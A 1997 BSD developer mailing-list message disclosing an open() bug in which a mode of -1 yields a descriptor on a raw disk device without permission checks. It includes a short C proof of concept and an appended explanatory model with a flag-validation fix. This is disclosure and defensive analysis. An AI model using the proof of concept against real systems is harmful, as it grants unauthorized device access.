From owner-freebsd-hackers Tue Oct 21 19:14:38 1997
Date: 17 Oct 1997 10:42:13 -0000
Message-ID: <19971017104213.11040.qmail@kechara.flame.org>
From: explorer@flame.org
To: developers@NetBSD.ORG
Subject: Possible SERIOUS bug in open()?
Delivered-To: netbsd-developers@NetBSD.ORG
Sender: owner-freebsd-hackers@FreeBSD.ORG
Precedence: bulk

This was sent to me recently... It seems to be a pretty serious hole in open() and permissions...
Note, in the following, open() succeeds, and ioctls are probably executed...

/*
 * This will give you a file descriptor on a device you should not have
 * access to. This seems really, really screwed up, since holding a fd
 * lets you do a lot of ioctls that you should not be able to do...
 */
#include <sys/types.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>

int
main(int argc, char **argv)
{
	int fd;

	/* -1 is not a valid open(2) mode; the point is that it is accepted */
	fd = open("/dev/rsd0a", -1, 0);
	if (fd < 0)
		err(1, "open");
	close(fd);
	return 0;
}
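The mail does not say why -1 gets through. The following is an added model (not code from the mail or from any BSD kernel) of one mechanism consistent with it: 4.4BSD-derived kernels translate the user flags with FFLAGS(oflag) = oflag + 1 and only consult file permissions for the FREAD/FWRITE bits that result, so -1 becomes 0 and no access check is requested. The KFREAD/KFWRITE values and the validate_open_flags() check are assumptions written for illustration, not the fix any project shipped.

```c
#include <fcntl.h>
#include <errno.h>
#include <unistd.h>

/* Assumed 4.4BSD-style kernel file flags and the open(2) -> kernel
 * translation: O_RDONLY (0) -> FREAD, O_WRONLY (1) -> FWRITE,
 * O_RDWR (2) -> FREAD|FWRITE. Anything else is passed through blindly. */
#define KFREAD  0x0001
#define KFWRITE 0x0002
#define KFFLAGS(oflag) ((oflag) + 1)

/* Kernel file flags the open would proceed with. For oflag == -1 this
 * is 0: neither read nor write access is requested. */
int open_to_file_flags(int oflag)
{
	return KFFLAGS(oflag);
}

/* Model of the permission decision: the filesystem is asked for read
 * access only when FREAD is set and write access only when FWRITE is
 * set. Returns the R_OK/W_OK bits that would be checked; 0 means the
 * open never asks about permissions at all, which is the hole. */
int access_bits_checked(int oflag)
{
	int f = open_to_file_flags(oflag);
	int checked = 0;

	if (f & KFREAD)
		checked |= R_OK;
	if (f & KFWRITE)
		checked |= W_OK;
	return checked;
}

/* Hardened entry check, applied before the translation above: the two
 * access-mode bits may be 00, 01 or 10, never 11. Every negative flag
 * word, including -1, has both bits set and is rejected with EINVAL,
 * while ordinary modes (with or without extra bits such as O_CREAT)
 * still pass. Returns 0 on success or an errno value. */
int validate_open_flags(int oflag)
{
	if ((oflag & O_ACCMODE) == O_ACCMODE)
		return EINVAL;
	return 0;
}
```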